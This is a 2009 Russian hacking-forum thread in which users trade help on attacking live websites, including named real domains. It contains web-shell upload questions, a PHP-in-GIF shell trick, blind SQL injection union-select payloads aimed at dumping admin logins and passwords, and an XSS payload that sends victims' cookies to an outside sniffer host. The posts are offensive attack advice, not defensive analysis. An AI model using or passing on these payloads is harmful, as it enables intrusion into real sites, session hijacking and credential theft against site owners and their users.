07.03.2009, 22:57
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Привет, сорри за нубский вопрос, залил пхп шелл на один сайт и обнаружил, что кроме него там еще две сотни, файл я могу залить папку к каждому, и вот я заливаю шелл в нужную мне папку, дергаю из браузера, но пхп не интерпретируется, файлы используются cfm (получается в одной папке пхп катит, в другой - нет), я бы залил хтаксес, но там Microsoft-IIS/5.0 сервак. Как залить шелл? Спасибо
зы: нужно для общего развития)
|
|
|
08.03.2009, 11:30
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
Че-то я не пойму как раскрутить её
http://www.fontsmith.com/custom.php?id=807
|
|
|
|
08.03.2009, 11:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
S0ulVortex, слепая скуля.
Код:
http://www.fontsmith.com/custom.php?id=9'+union+select+1,2,3,4,5,6,7,8,9/*
проблема в том что стоит два (или четыре) подряд запроса с разным количеством полей в запросе и параметр подставляется туда и туда. Получается если заюзать количество столбиков в юнионе которое равно количеству в первом запросе, то второй выдаст ошибку, если равное количеству во втором то ошибку выдаст первый, если вообще левое, то ОБА выдадут ошибку (это и есть твои 4 ошибки).
|
|
|
|
08.03.2009, 17:14
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
С нами:
9045926
Репутация:
0
|
|
Вопрос:
допустим я нашол XSS - http://torg.mail.ru/news/?0103/2009"><script>alert(document.cookie)</script>
Вопрос, как её заносить в ссылку по которой должен отклик от жертвы произойти со скоиптом ("><script>alert(document.cookie)</script>) или без ?????
|
|
|
|
08.03.2009, 17:26
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
http://torg.mail.ru/news/?0103/2009"><script>img = new Image(); img.src = "http://сниффер?"+document.cookie;</script>
так. статьи почитай, в них все это описано. от Micr0b'a например.
|
|
|
|
08.03.2009, 19:16
|
|
Новичок
Регистрация: 04.03.2009
Сообщений: 23
С нами:
9045926
Репутация:
0
|
|
Сообщение от faza02
так. статьи почитай, в них все это описано. от Micr0b'a например.
Да я уже везде полазил.
Именно этот момент не уточнён, со скриптом или без.
|
|
|
|
08.03.2009, 21:13
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
Народ чет не понятен вопрос шелл через картинку
вставляю в конец файла(.gif) (открытым блокнотом) к примеру
<?php
echo "zzzzz"
?>
Он у меня заливает но картинка становиться большой 8*292 x 8*292 пикселей
И не выводиться "zzzzz"
Что делать? С чем это едят?
|
|
|
|
08.03.2009, 21:22
|
|
Познающий
Регистрация: 12.09.2006
Сообщений: 35
С нами:
10348058
Репутация:
2
|
|
Задумывался над тем же вопросом. Хорошая статья разора.
http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/
|
|
|
|
08.03.2009, 21:28
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
YoriK мне эта статья не нужна так как там юзаеться программа спец. а мне нужно через блокнот это все
|
|
|
|
08.03.2009, 23:19
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
С нами:
9416045
Репутация:
126
|
|
всё начиналось очень хорошо, пока дело не дошло до вывода админских логинов:паролей..
значит запрос такой:
=-24+union+select+1,concat(tp)+from+events--
и в ответ ничего кроме всяческих ошибок.. что можно сделать? |
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
